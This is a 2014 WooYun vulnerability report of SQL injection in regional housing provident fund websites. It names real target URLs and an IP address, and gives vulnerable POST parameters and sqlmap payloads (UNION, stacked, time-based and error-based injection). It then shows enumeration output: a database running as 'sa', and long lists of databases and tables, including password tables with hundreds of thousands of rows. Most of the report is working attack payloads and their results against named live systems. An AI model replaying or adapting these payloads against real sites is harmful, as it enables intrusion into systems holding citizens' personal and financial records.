多个地区住房公积金管理平台SQL注射 | wooyun-2014-054399| WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2014-054399

漏洞标题：多个地区住房公积金管理平台SQL注射

漏洞作者：超威蓝猫

提交时间：2014-03-26 13:00

修复时间：2014-05-10 13:01

公开时间：2014-05-10 13:01

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：18

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2014-03-26：细节已通知厂商并且等待厂商处理中
2014-03-30：厂商已经确认，细节仅向厂商公开
2014-04-09：细节向核心白帽子及相关领域专家公开
2014-04-19：细节向普通白帽子公开
2014-04-29：细节向实习白帽子公开
2014-05-10：细节向公众公开

简要描述：

多个地区住房公积金管理平台SQL注射

详细说明：

注射点1

http://220.178.98.86/hfgjj/jsp/web/public/search/getPw.jsp (POST)
zgyhzh=123456789&xm=123456789&sjhm=123456789

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: POST
Parameter: zgyhzh
    Type: UNION query
    Title: Generic UNION query (NULL) - 9 columns
    Payload: zgyhzh=123456789' UNION ALL SELECT NULL,NULL,CHAR(113)+CHAR(111)+CHAR(110)+CHAR(99)+CHAR(113)+CHAR(76)+CHAR(99)+CHAR(116)+CHAR(85)+CHAR(99)+CHAR(119)+CHAR(104)+CHAR(115)+CHAR(77)+CHAR(103)+CHAR(113)+CHAR(102)+CHAR(108)+CHAR(115)+CHAR(113),NULL,NULL,NULL,NULL,NULL,NULL-- &xm=123456789&sjhm=123456789
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: zgyhzh=123456789'; WAITFOR DELAY '0:0:5'--&xm=123456789&sjhm=123456789
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: zgyhzh=123456789' WAITFOR DELAY '0:0:5'--&xm=123456789&sjhm=123456789
---
web server operating system: Windows
web application technology: Apache 2.2.22, JSP
back-end DBMS: Microsoft SQL Server 2000
current user:    'sa'
current database:    'hfgjj'
available databases [7]:
[*] gjj
[*] hengke
[*] hfgjj
[*] master
[*] model
[*] msdb
[*] tempdb
Database: tempdb
+--------------------------------------------+---------+
| Table                                      | Entries |
+--------------------------------------------+---------+
| dbo.syssegments                            | 3       |
+--------------------------------------------+---------+
Database: msdb
+--------------------------------------------+---------+
| Table                                      | Entries |
+--------------------------------------------+---------+
| dbo.RTblRelships                           | 6922    |
| dbo.RTblIfaceHier                          | 3349    |
| dbo.RTblVersionAdminInfo                   | 2333    |
| dbo.RTblVersions                           | 2333    |
| dbo.RTblNamedObj                           | 2196    |
| dbo.RTblIfaceMem                           | 1189    |
| dbo.RTblPropDefs                           | 797     |
| dbo.RTblClassDefs                          | 537     |
| dbo.RTblIfaceDefs                          | 453     |
| dbo.RTblProps                              | 393     |
| dbo.RTblRelColDefs                         | 320     |
| dbo.sysjobhistory                          | 200     |
| dbo.RTblRelshipDefs                        | 144     |
| dbo.RTblParameterDef                       | 136     |
| dbo.sysconstraints                         | 101     |
| dbo.RTblClassExtension                     | 69      |
| dbo.RTblSites                              | 44      |
| dbo.backupfile                             | 42      |
| dbo.sysdtspackages                         | 35      |
| dbo.RTblRelshipProps                       | 28      |
| dbo.backupset                              | 21      |
| dbo.syscategories                          | 19      |
| dbo.RTblTypeLibs                           | 17      |
| dbo.backupmediafamily                      | 16      |
| dbo.backupmediaset                         | 16      |
| dbo.sysalerts                              | 9       |
| dbo.sysdtscategories                       | 3       |
| dbo.syssegments                            | 3       |
| dbo.restorefilegroup                       | 2       |
| dbo.restorefilegroup                       | 2       |
| dbo.restorehistory                         | 2       |
| dbo.sysjobs_view                           | 2       |
| dbo.sysjobs_view                           | 2       |
| dbo.sysjobschedules                        | 2       |
| dbo.sysjobservers                          | 2       |
| dbo.sysjobsteps                            | 2       |
| dbo.RTblDatabaseVersion                    | 1       |
| dbo.sysdbmaintplans                        | 1       |
| dbo.systargetservers_view                  | 1       |
| dbo.systargetservers_view                  | 1       |
+--------------------------------------------+---------+
Database: master
+--------------------------------------------+---------+
| Table                                      | Entries |
+--------------------------------------------+---------+
| dbo.v_dw_gjmx                              | 78509   |
| dbo.v_168_dwgjmx                           | 77547   |
| dbo.v_168_dz_old                           | 33801   |
| dbo.v_168_dz_old                           | 33801   |
| INFORMATION_SCHEMA.PARAMETERS              | 3617    |
| INFORMATION_SCHEMA.ROUTINES                | 1019    |
| dbo.spt_values                             | 730     |
| INFORMATION_SCHEMA.COLUMNS                 | 521     |
| INFORMATION_SCHEMA.COLUMN_PRIVILEGES       | 379     |
| INFORMATION_SCHEMA.VIEW_COLUMN_USAGE       | 302     |
| INFORMATION_SCHEMA.ROUTINE_COLUMNS         | 159     |
| INFORMATION_SCHEMA.VIEW_TABLE_USAGE        | 63      |
| INFORMATION_SCHEMA.TABLES                  | 52      |
| INFORMATION_SCHEMA.TABLE_PRIVILEGES        | 34      |
| dbo.spt_server_info                        | 29      |
| INFORMATION_SCHEMA.VIEWS                   | 26      |
| dbo.spt_provider_types                     | 25      |
| dbo.spt_datatype_info_ext                  | 10      |
| dbo.spt_datatype_info_ext                  | 10      |
| dbo.sysconstraints                         | 7       |
| INFORMATION_SCHEMA.SCHEMATA                | 7       |
| INFORMATION_SCHEMA.CONSTRAINT_COLUMN_USAGE | 6       |
| INFORMATION_SCHEMA.CONSTRAINT_TABLE_USAGE  | 6       |
| INFORMATION_SCHEMA.KEY_COLUMN_USAGE        | 6       |
| INFORMATION_SCHEMA.TABLE_CONSTRAINTS       | 6       |
| dbo.syslogins                              | 3       |
| dbo.syssegments                            | 3       |
| dbo.MSreplication_options                  | 2       |
| dbo.spt_monitor                            | 1       |
| dbo.sysoledbusers                          | 1       |
+--------------------------------------------+---------+
Database: hengke
+--------------------------------------------+---------+
| Table                                      | Entries |
+--------------------------------------------+---------+
| dbo.Pub_114User                            | 11671   |
| dbo.Tx_Jf_OneRate                          | 4005    |
| dbo.PUB_CITYINFO                           | 3276    |
| dbo.sysconstraints                         | 3186    |
| dbo.TempOterMoney1                         | 3153    |
| dbo.TempOterMoney1                         | 3153    |
| dbo.TempOterMoney2                         | 3153    |
| dbo.Pub_MonthMoneyTemp                     | 2798    |
| dbo.Pub_DataDict                           | 1470    |
| dbo.MainRate$                              | 1191    |
| dbo.MainRate$                              | 1191    |
| dbo.haoma$                                 | 1103    |
| dbo.Tx_Jf_RateModule                       | 976     |
| dbo.Pub_GridColWidth                       | 915     |
| dbo.test5                                  | 821     |
| dbo.test5                                  | 821     |
| dbo.TempAccMoney                           | 565     |
| dbo.Tx_Sl_RunStepMx                        | 549     |
| dbo.vPub_GridColWidth                      | 488     |
| dbo.Tx_Sj_CmdModuleStep                    | 381     |
| dbo.TX_YY_Hint                             | 333     |
| dbo.TX_YY_SysPara                          | 213     |
| dbo.Cti_Voc_File                           | 187     |
| dbo.v_QueryWorkMx                          | 186     |
| dbo.PUB_Sysfunction                        | 150     |
| dbo.PUB_SysDllModul                        | 112     |
| dbo.Pub_ListValue                          | 106     |
| dbo.Tx_SL_SfMoney                          | 105     |
| dbo.Cti_Channel                            | 88      |
| dbo.TX_YY_MixIdxMod                        | 83      |
| dbo.TX_YY_MixIdxMod                        | 83      |
| dbo.Tx_Sf_AccMoney_Bak                     | 81      |
| dbo.Tx_Sf_AccMoney_Bak                     | 81      |
| dbo.Pub_Parainfor                          | 80      |
| dbo.Tx_Sj_CmdModuleItem                    | 77      |
| dbo.v_Chan_Drs                             | 72      |
| dbo.PUB_SysMenu                            | 70      |
| dbo.TX_YY_ChaUse                           | 70      |
| dbo.SYS_POWER_DEF                          | 67      |
| dbo.Cti_Syspara                            | 60      |
| dbo.TX_YY_Flow                             | 53      |
| dbo.Tx_JF_ReceFormat                       | 52      |
| dbo.V_ChaUse                               | 48      |
| dbo.PlayInkeylen                           | 47      |
| dbo.Tx_Sf_PayMents_Bak                     | 45      |
| dbo.Tx_Sf_PayMents_Bak                     | 45      |
| dbo.Pub_AutoDownDll                        | 44      |
| dbo.Tx_Sf_PayMoney_Bak                     | 40      |
| dbo.Tx_Sf_PayMoney_Bak                     | 40      |
| dbo.Tx_Sl_RunStepDef                       | 35      |
| dbo.SYS_LOG_TYPE                           | 34      |
| dbo.SYS_LOG_TYPE                           | 34      |
| dbo.Tx_Zl_PatternInfor                     | 33      |
| dbo.Pub_ReportList                         | 31      |
| dbo.SubRate$                               | 31      |
| dbo.SubRate$                               | 31      |
| dbo.TX_Zl_2MTrunk                          | 31      |
| dbo.Tx_Jf_OtherMoneyItem                   | 30      |
| dbo.v_NetManage                            | 28      |
| dbo.TX_FC_ZJQK                             | 27      |
| dbo.v_LimitWay                             | 27      |
| dbo.Tx_yy_letterKey                        | 26      |
| dbo.Tx_Sl_OperKind                         | 23      |
| dbo.Tx_Oper_Way                            | 22      |
| dbo.Tx_Sl_OperRunMoney                     | 20      |
| dbo.Tx_Sl_OperRunName                      | 20      |
| dbo.v_OperMoneyList                        | 20      |
| dbo.v_OperMoneyList                        | 20      |
| dbo.Tx_Jf_RateHoliday                      | 19      |
| dbo.Tx_Sj_YfLimit                          | 19      |
| dbo.Tx_2rd_DialHis                         | 17      |
| dbo.TX_YY_MixUseLst                        | 16      |
| dbo.SYS_POWER_TYPE                         | 15      |
| dbo.Tx_CS_CmdRule                          | 15      |
| dbo.TX_Sl_CmdLst                           | 15      |
| dbo.Pub_SysTag                             | 14      |
| dbo.Tx_Jf_OtherMoneyList                   | 14      |
| dbo.PUB_OPGROUP                            | 13      |
| dbo.Tx_Sj_LimitStandard                    | 13      |
| dbo.TX_YY_ShortKey                         | 13      |
| dbo.Tx_Oper_Kind                           | 12      |
| dbo.Tx_Oper_Pbx                            | 12      |
| dbo.TX_YY_FKList                           | 12      |
| dbo.Tx_Hx_DevFormate                       | 11      |
| dbo.Tx_Jf_RemoveMoney                      | 11      |
| dbo.Tx_Wy_AreaLst                          | 11      |
| dbo.Tx_Wy_CapperDays                       | 10      |
| dbo.Tx_Wy_CapperDays                       | 10      |
| dbo.V_112_BugType                          | 10      |
| dbo.v_Hx_DevArea                           | 10      |
| dbo.Pub_BillType                           | 9       |
| dbo.Tx_Jf_AccFormula                       | 9       |
| dbo.Tx_Jf_DkLst                            | 9       |
| dbo.Pub_WaterID                            | 8       |
| dbo.Tx_Kd_FeeTypeDCBI                      | 8       |
| dbo.Tx_Sj_KeyPress                         | 8       |
| dbo.Tx_Zl_RouteArea                        | 8       |
| dbo.v_GetOperTaskParent                    | 8       |
| dbo.v_Jf_RateCutView                       | 8       |
| dbo.PUB_BS_Operator                        | 7       |
| dbo.TX_CS_TestKind                         | 7       |
| dbo.Tx_Hx_DevType                          | 7       |
| dbo.Tx_Oper_NewOper                        | 7       |
| dbo.Tx_Sj_QfLimit                          | 7       |
| dbo.TX_YY_UseList                          | 7       |
| dbo.Cti_ModSet                             | 6       |
| dbo.TX_YW_DevNetworkType                   | 6       |
| dbo.Pub_FilterModule                       | 5       |
| dbo.Pub_TeleCos                            | 5       |
| dbo.tx_JF_ErrorLevel                       | 5       |
| dbo.Tx_Jf_RateTree                         | 5       |
| dbo.Tx_Oper_Group                          | 5       |
| dbo.TX_YY_DialTimeRule                     | 5       |
| dbo.IE_TreeView                            | 4       |
| dbo.Pub_TeleCardSet                        | 4       |
| dbo.TX_112_ExecResult                      | 4       |
| dbo.TX_FC_fckind                           | 4       |
| dbo.Tx_Hx_DevFact                          | 4       |
| dbo.Tx_Ic_Lev                              | 4       |
| dbo.TX_JF_InputMoney                       | 4       |
| dbo.Tx_Jf_OtherMoneyDoWay                  | 4       |
| dbo.Tx_JF_ProcResult                       | 4       |
| dbo.Tx_Sl_AreaPbxCodeList                  | 4       |
| dbo.Tx_Sl_WorkGroup                        | 4       |
| dbo.Tx_Wy_SchoolMoney                      | 4       |
| dbo.TX_YW_DEVTYPE                          | 4       |
| dbo.TX_YY_DialDateRule                     | 4       |
| dbo.TX_YY_DialWeekRule                     | 4       |
| dbo.TX_YY_NoDialRule                       | 4       |
| dbo.v_GetJiFeiRentKind                     | 4       |
| dbo.v_Sl_CodeRang                          | 4       |
| dbo.Pub_LevelGroup                         | 3       |
| dbo.Pub_NewOper                            | 3       |
| dbo.Pub_TeleInUseing                       | 3       |
| dbo.Pub_UserKind                           | 3       |
| dbo.SYS_OPERATOR                           | 3       |
| dbo.syssegments                            | 3       |
| dbo.TX_112_bugTypeT                        | 3       |
| dbo.TX_112_ExecSta                         | 3       |
| dbo.Tx_Hx_OptSta                           | 3       |
| dbo.Tx_Jf_RateServerName                   | 3       |
| dbo.Tx_Jf_Route                            | 3       |
| dbo.Tx_Oper_Rule                           | 3       |
| dbo.Tx_Oper_Sta                            | 3       |
| dbo.Tx_Sj_LeftMoneyProc                    | 3       |
| dbo.Tx_Wy_SchoolLst                        | 3       |
| dbo.TX_YW_USERTYPE                         | 3       |
| dbo.TX_YY_DialNumRule                      | 3       |
| dbo.TX_YY_OPT                              | 3       |
| dbo.v_CjWay2                               | 3       |
| dbo.v_CjWay2                               | 3       |
| dbo.v_GetDevPortStatus                     | 3       |
| dbo.v_Jf_AccFormula                        | 3       |
| dbo.v_PubTeleInUse                         | 3       |
| dbo.v_sf_GetAccType                        | 3       |
| dbo.v_sf_GetSfOpertor                      | 3       |
| dbo.Pub_PbxInfor                           | 2       |
| dbo.Pub_TeleKind                           | 2       |
| dbo.sys_Station                            | 2       |
| dbo.Tx_112_ExecMan                         | 2       |
| dbo.TX_CS_TestWay                          | 2       |
| dbo.Tx_JF_DerateKind                       | 2       |
| dbo.Tx_Jf_OtherMoneyGuiZhe                 | 2       |
| dbo.Tx_Jf_PanJinZhuanZhang                 | 2       |
| dbo.Tx_Jf_RateCutMoney                     | 2       |
| dbo.Tx_Jf_RateModiMoney                    | 2       |
| dbo.Tx_Jf_ReportList                       | 2       |
| dbo.Tx_Jf_ReportList                       | 2       |
| dbo.Tx_Oper_ClientArea                     | 2       |
| dbo.Tx_Oper_Paper                          | 2       |
| dbo.Tx_Sj_LimitWay                         | 2       |
| dbo.Tx_Sj_MLeftProcess                     | 2       |
| dbo.Tx_SL_AreaList                         | 2       |
| dbo.Tx_Sl_AreaPbxList                      | 2       |
| dbo.TX_YW_DevBrand                         | 2       |
| dbo.Tx_YY_HardKind                         | 2       |
| dbo.v_AreaPbxNameLst                       | 2       |
| dbo.v_GetJiFeiDerateKind                   | 2       |
| dbo.v_GetJiFeiType                         | 2       |
| dbo.v_GetOperOpLst                         | 2       |
| dbo.DutyNum                                | 1       |
| dbo.Ie_News                                | 1       |
| dbo.Pub_teleuserBak                        | 1       |
| dbo.SYS_POWER_GROUP                        | 1       |
| dbo.TX_CS_ComUse                           | 1       |
| dbo.Tx_Hx_DevManager                       | 1       |
| dbo.Tx_Jf_CutCheLue                        | 1       |
| dbo.Tx_Jf_PanJinOtherMoney                 | 1       |
| dbo.Tx_Jf_PassAccCode                      | 1       |
| dbo.Tx_Jf_ReceStation                      | 1       |
| dbo.Tx_Jf_TaoCanItem                       | 1       |
| dbo.Tx_Mail_Message                        | 1       |
| dbo.Tx_Oper_ChargeStandard                 | 1       |
| dbo.Tx_Sf_Station                          | 1       |
| dbo.Tx_Sl_TurnWgrp                         | 1       |
| dbo.TX_YW_DevModel                         | 1       |
| dbo.Tx_YY_EnterAgtByCaller                 | 1       |
| dbo.TX_YY_HwtNumSet                        | 1       |
| dbo.TX_YY_TeleWeiHu                        | 1       |
| dbo.V_ComUse                               | 1       |
| dbo.V_Hx_ZN_2MOvertime                     | 1       |
| dbo.V_Tx_YY_EnterAgtByCaller               | 1       |
+--------------------------------------------+---------+
Database: hfgjj
+--------------------------------------------+---------+
| Table                                      | Entries |
+--------------------------------------------+---------+
| dbo.v_168_dz1                              | 7603650 |
| dbo.v_web_hdmx                             | 4945434 |
| dbo.v_save_password                        | 708168  |
| dbo.v_dw_gjmx_old                          | 654451  |
| dbo.v_dw_gjmx_old                          | 654451  |
| dbo.v_web_wttqmx_old                       | 462191  |
| dbo.v_web_wttqmx_old                       | 462191  |
| dbo.v_web_wttqmx_old                       | 462191  |
| dbo.v_168_dz_old_yl                        | 424834  |
| dbo.v_web_shgc                             | 361934  |
| dbo.v_168_dwhjqk_old                       | 290071  |
| dbo.v_168_dwhjqk_old                       | 290071  |
| dbo.v_168_dwzz_old                         | 286660  |
| dbo.v_168_dwzz_old                         | 286660  |
| dbo.v_168_info_old                         | 244021  |
| dbo.v_168_info_old                         | 244021  |
| dbo.v_web_wtmx12                           | 238842  |
| dbo.v_web_wtmx10                           | 120510  |
| dbo.v_168_dz2                              | 101403  |
| dbo.v_web_wtmx11                           | 89190   |
| dbo.v_dw_gzmx                              | 76545   |
| dbo.v_dwhjqk_old                           | 67119   |
| dbo.v_dwhjqk_old                           | 67119   |
| dbo.v_09_10_xh                             | 59814   |
| dbo.v_web_wtmx09                           | 34592   |
| dbo.v_web_hdqk1                            | 29389   |
| dbo.v_web_hdqk1                            | 29389   |
| dbo.sys_log                                | 20451   |
| dbo.hdzx                                   | 11659   |
| dbo.v_168_dwinfo                           | 9130    |
| dbo.v_house_info                           | 8162    |
| dbo.v_web_sdqk                             | 6636    |
| dbo.v_save_etps_password                   | 6354    |
| dbo.tongji                                 | 4323    |
| dbo.web_dwinfo                             | 3387    |
| dbo.v_168_dwdz                             | 1043    |
| dbo.cms_hdjl                               | 464     |
| dbo.SYS_SITERIGHT                          | 360     |
| dbo.WELFARE_NEWS                           | 257     |
| dbo.sys_role_resource                      | 192     |
| dbo.sys_role_resource                      | 192     |
| dbo.fagui                                  | 102     |
| dbo.wenjian                                | 74      |
| dbo.supply_note                            | 69      |
| dbo.sys_resource                           | 60      |
| dbo.sys_user_role                          | 47      |
| dbo.sys_user_role                          | 47      |
| dbo.xzsp_dw                                | 39      |
| dbo.xzsp_dw                                | 39      |
| dbo.SYS_MENU                               | 38      |
| dbo.mail_material                          | 34      |
| dbo.supply_replynote                       | 34      |
| dbo.sysconstraints                         | 34      |
| dbo.focus_user                             | 30      |
| dbo.pbcatcol                               | 29      |
| dbo.kill_kk                                | 21      |
| dbo.pbcatedt                               | 21      |
| dbo.DIY_TEMPTALBLE                         | 20      |
| dbo.pbcatfmt                               | 20      |
| dbo.CULTURE_INVESTDETAIL                   | 13      |
| dbo.sqlmapoutput                           | 13      |
| dbo.D99_CMD                                | 12      |
| dbo.hero_table                             | 12      |
| dbo.sys_user_unit                          | 8       |
| dbo.h_quyu                                 | 7       |
| dbo.advise_upload                          | 6       |
| dbo.xzxk                                   | 6       |
| dbo.v_168_gjd                              | 5       |
| dbo.INNER_INFO                             | 4       |
| dbo.renyuan_dw                             | 4       |
| dbo.renyuan_dw                             | 4       |
| dbo.class_supply                           | 3       |
| dbo.sys_unittype                           | 3       |
| dbo.syssegments                            | 3       |
| dbo.zxbs                                   | 3       |
| dbo.CULTURE_INVESTED                       | 2       |
| dbo.D99_Tmp                                | 2       |
| dbo.fellow_class                           | 2       |
| dbo.fellow_link                            | 2       |
| dbo.h_loupan                               | 2       |
| dbo.pbcattbl                               | 2       |
| dbo.tz_js                                  | 2       |
| dbo.tz_note                                | 2       |
| dbo.D99_REG                                | 1       |
| dbo.h_loudong                              | 1       |
| dbo.LIFA_NEWS                              | 1       |
| dbo.sys_siteprevilige                      | 1       |
| dbo.sys_siteprevilige                      | 1       |
| dbo.v_update_Time                          | 1       |
+--------------------------------------------+---------+
Database: gjj
+--------------------------------------------+---------+
| Table                                      | Entries |
+--------------------------------------------+---------+
| dbo.v_168_dwhjqk                           | 69152   |
| dbo.sys_log                                | 6291    |
| dbo.v_168_dwinfo                           | 3317    |
| dbo.tongji                                 | 629     |
| dbo.v_168_dwdz                             | 385     |
| dbo.SYS_SITERIGHT                          | 352     |
| dbo.sys_role_resource                      | 210     |
| dbo.sys_role_resource                      | 210     |
| dbo.cms_hdjl                               | 108     |
| dbo.fagui                                  | 102     |
| dbo.supply_note                            | 69      |
| dbo.sys_resource                           | 68      |
| dbo.sys_user_role                          | 38      |
| dbo.sys_user_role                          | 38      |
| dbo.mail_material                          | 34      |
| dbo.supply_replynote                       | 34      |
| dbo.SYS_MENU                               | 31      |
| dbo.focus_user                             | 30      |
| dbo.kill_kk                                | 21      |
| dbo.pbcatedt                               | 21      |
| dbo.pbcatfmt                               | 20      |
| dbo.CULTURE_INVESTDETAIL                   | 13      |
| dbo.hero_table                             | 12      |
| dbo.advise_upload                          | 6       |
| dbo.D99_CMD                                | 5       |
| dbo.sys_user_unit                          | 5       |
| dbo.INNER_INFO                             | 4       |
| dbo.renyuan_dw                             | 4       |
| dbo.renyuan_dw                             | 4       |
| dbo.class_supply                           | 3       |
| dbo.syssegments                            | 3       |
| dbo.CULTURE_INVESTED                       | 2       |
| dbo.fellow_class                           | 2       |
| dbo.fellow_link                            | 2       |
| dbo.sys_unittype                           | 2       |
| dbo.sysconstraints                         | 2       |
| dbo.LIFA_NEWS                              | 1       |
| dbo.sys_siteprevilige                      | 1       |
| dbo.sys_siteprevilige                      | 1       |
+--------------------------------------------+---------+
Database: model
+--------------------------------------------+---------+
| Table                                      | Entries |
+--------------------------------------------+---------+
| dbo.syssegments                            | 3       |
+--------------------------------------------+---------+

注射点2

http://www.nbgjj.com/cha/PassToEmail.aspx?type=01 (POST)
__VIEWSTATE=/wEPDwUJMjYwODE0ODIxD2QWAgIDD2QWAgILDw9kFgIeCW9ua2V5ZG93bgUUcmV0dXJuICAgR2V0Rm9jdXMoKTtkZMSPM1KelvaP3KVpLgY%2B9%2BwsSeg0&__EVENTVALIDATION=/wEWCAL07/%2B8AwLs0bLrBgKM54rGBgLs0fbZDALWlM%2BbAgLs0e58ArursYYIAoXZ9dsDZtnhUp/VhoT0LkxD4lvykCwQCVs%3D&TextBox1=admin&Button1=%E5%AF%86%E7%A0%81%E6%89%BE%E5%9B%9E&TextBox2=&TextBox4=

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: POST
Parameter: TextBox1
    Type: boolean-based blind
    Title: Microsoft SQL Server/Sybase stacked conditional-error blind queries
    Payload: __VIEWSTATE=/wEPDwUJMjYwODE0ODIxD2QWAgIDD2QWAgILDw9kFgIeCW9ua2V5ZG93bgUUcmV0dXJuICAgR2V0Rm9jdXMoKTtkZMSPM1KelvaP3KVpLgY+9+wsSeg0&__EVENTVALIDATION=/wEWCAL07/+8AwLs0bLrBgKM54rGBgLs0fbZDALWlM+bAgLs0e58ArursYYIAoXZ9dsDZtnhUp/VhoT0LkxD4lvykCwQCVs=&TextBox1=admin'; IF(7359=7359) SELECT 7359 ELSE DROP FUNCTION wZgX--&Button1=%E5%AF%86%E7%A0%81%E6%89%BE%E5%9B%9E&TextBox2=&TextBox4=
    Type: error-based
    Title: Microsoft SQL Server/Sybase OR error-based - WHERE or HAVING clause
    Payload: __VIEWSTATE=/wEPDwUJMjYwODE0ODIxD2QWAgIDD2QWAgILDw9kFgIeCW9ua2V5ZG93bgUUcmV0dXJuICAgR2V0Rm9jdXMoKTtkZMSPM1KelvaP3KVpLgY+9+wsSeg0&__EVENTVALIDATION=/wEWCAL07/+8AwLs0bLrBgKM54rGBgLs0fbZDALWlM+bAgLs0e58ArursYYIAoXZ9dsDZtnhUp/VhoT0LkxD4lvykCwQCVs=&TextBox1=-2556' OR 1380=CONVERT(INT,(SELECT CHAR(113)+CHAR(101)+CHAR(109)+CHAR(104)+CHAR(113)+(SELECT (CASE WHEN (1380=1380) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(97)+CHAR(112)+CHAR(121)+CHAR(113))) AND 'YczW'='YczW&Button1=%E5%AF%86%E7%A0%81%E6%89%BE%E5%9B%9E&TextBox2=&TextBox4=
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: __VIEWSTATE=/wEPDwUJMjYwODE0ODIxD2QWAgIDD2QWAgILDw9kFgIeCW9ua2V5ZG93bgUUcmV0dXJuICAgR2V0Rm9jdXMoKTtkZMSPM1KelvaP3KVpLgY+9+wsSeg0&__EVENTVALIDATION=/wEWCAL07/+8AwLs0bLrBgKM54rGBgLs0fbZDALWlM+bAgLs0e58ArursYYIAoXZ9dsDZtnhUp/VhoT0LkxD4lvykCwQCVs=&TextBox1=admin'; WAITFOR DELAY '0:0:5'--&Button1=%E5%AF%86%E7%A0%81%E6%89%BE%E5%9B%9E&TextBox2=&TextBox4=
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: __VIEWSTATE=/wEPDwUJMjYwODE0ODIxD2QWAgIDD2QWAgILDw9kFgIeCW9ua2V5ZG93bgUUcmV0dXJuICAgR2V0Rm9jdXMoKTtkZMSPM1KelvaP3KVpLgY+9+wsSeg0&__EVENTVALIDATION=/wEWCAL07/+8AwLs0bLrBgKM54rGBgLs0fbZDALWlM+bAgLs0e58ArursYYIAoXZ9dsDZtnhUp/VhoT0LkxD4lvykCwQCVs=&TextBox1=admin' WAITFOR DELAY '0:0:5'--&Button1=%E5%AF%86%E7%A0%81%E6%89%BE%E5%9B%9E&TextBox2=&TextBox4=
---
web server operating system: Windows Vista
web application technology: ASP.NET, ASP.NET 2.0.50727, Microsoft IIS 7.0
back-end DBMS: Microsoft SQL Server 2005
current user:    'nbgjj'
current database:    'nbgjjcx'
available databases [12]:
[*] ajstat
[*] FZXGJJCX
[*] gjj
[*] master
[*] model
[*] msdb
[*] nbgjjcx
[*] nbgjjcxbak
[*] nbgjjls
[*] nbgjjwz
[*] nbgjjwz2012
[*] tempdb
Database: FZXGJJCX
+--------------------------------------------------+---------+
| Table                                            | Entries |
+--------------------------------------------------+---------+
| dbo.da_grjb_Pwd                                  | 583994  |
| dbo.da_grjb                                      | 508738  |
| dbo.xd_fhz                                       | 26744   |
| dbo.GJ_DWZH_Pwd                                  | 8937    |
| dbo.gj_dwzh                                      | 8926    |
| dbo.Import_Log                                   | 108     |
| dbo.AdminUser                                    | 9       |
| dbo.pwd_change                                   | 3       |
+--------------------------------------------------+---------+
Database: nbgjjwz2012
+--------------------------------------------------+---------+
| Table                                            | Entries |
+--------------------------------------------------+---------+
| dbo.D_AdminLog                                   | 12236   |
| dbo.D_Dictionary                                 | 4628    |
| dbo.D_U_xinxiang                                 | 1112    |
| dbo.D_U_kedailoupan                              | 475     |
| dbo.D_UserLog                                    | 469     |
| dbo.D_UserAccount                                | 447     |
| dbo.D_Field                                      | 343     |
| dbo.D_Iframe                                     | 241     |
| dbo.D_U_Article                                  | 218     |
| dbo.D_U_JGWM                                     | 211     |
| dbo.D_Collection_Field                           | 198     |
| dbo.D_Column                                     | 154     |
| dbo.D_Label                                      | 142     |
| dbo.D_User                                       | 88      |
| dbo.D_UserFriendGroup                            | 88      |
| dbo.D_User_Person                                | 76      |
| dbo.D_Class                                      | 74      |
| dbo.D_U_Redianwenda                              | 65      |
| dbo.D_Style                                      | 60      |
| dbo.D_U_Down                                     | 55      |
| dbo.D_Account                                    | 54      |
| dbo.D_U_Zhigongfengcai                           | 47      |
| dbo.D_U_Yewujieda                                | 40      |
| dbo.D_Admin                                      | 36      |
| dbo.D_InsertWeb                                  | 29      |
| dbo.D_U_post                                     | 27      |
| dbo.D_U_zhengcefagui                             | 26      |
| dbo.D_Regex                                      | 21      |
| dbo.D_InfoModel                                  | 15      |
| dbo.D_Tag                                        | 15      |
| dbo.D_U_shoutuozhongjie                          | 15      |
| dbo.D_SinglePage                                 | 14      |
| dbo.D_UserGroup                                  | 14      |
| dbo.D_Collection_Item                            | 12      |
| dbo.D_U_bbs                                      | 12      |
| dbo.D_User_Business                              | 12      |
| dbo.D_PowerGroup                                 | 11      |
| dbo.D_Search                                     | 8       |
| dbo.D_UserIframe                                 | 7       |
| dbo.D_Aspxcs                                     | 6       |
| dbo.D_U_shoutuoyinhang                           | 6       |
| dbo.D_U_zhigongxiangce                           | 5       |
| dbo.D_Collection_List                            | 3       |
| dbo.D_DataSource                                 | 3       |
| dbo.D_Excel                                      | 3       |
| dbo.D_LikePage                                   | 3       |
| dbo.D_VSLabel                                    | 3       |
| dbo.D_TemplateProgram                            | 2       |
| dbo.D_UserModel                                  | 2       |
| dbo.D_Form                                       | 1       |
| dbo.D_LabelParam                                 | 1       |
| dbo.D_LabelToFile                                | 1       |
| dbo.D_UserFavorite                               | 1       |
| dbo.D_UserGrade                                  | 1       |
| dbo.D_VoteLimit                                  | 1       |
+--------------------------------------------------+---------+
Database: msdb
+--------------------------------------------------+---------+
| Table                                            | Entries |
+--------------------------------------------------+---------+
| dbo.backupfile                                   | 84      |
| dbo.backupset                                    | 42      |
| dbo.backupmediafamily                            | 39      |
| dbo.backupmediaset                               | 39      |
| dbo.restorefile                                  | 6       |
| dbo.restorefilegroup                             | 3       |
| dbo.restorehistory                               | 3       |
+--------------------------------------------------+---------+
Database: nbgjjwz
+--------------------------------------------------+---------+
| Table                                            | Entries |
+--------------------------------------------------+---------+
| dbo.D_AdminLog                                   | 6432    |
| dbo.D_Dictionary                                 | 4628    |
| dbo.D_U_xinxiang                                 | 2355    |
| dbo.D_UserAccount                                | 1015    |
| dbo.D_UserLog                                    | 785     |
| dbo.D_U_Article                                  | 564     |
| dbo.D_U_kedailoupan                              | 562     |
| dbo.ServiceView                                  | 417     |
| dbo.D_Field                                      | 346     |
| dbo.D_User                                       | 342     |
| dbo.D_UserFriendGroup                            | 342     |
| dbo.D_User_Person                                | 330     |
| dbo.D_Iframe                                     | 241     |
| dbo.D_U_JGWM                                     | 211     |
| dbo.D_Label                                      | 142     |
| dbo.D_Column                                     | 116     |
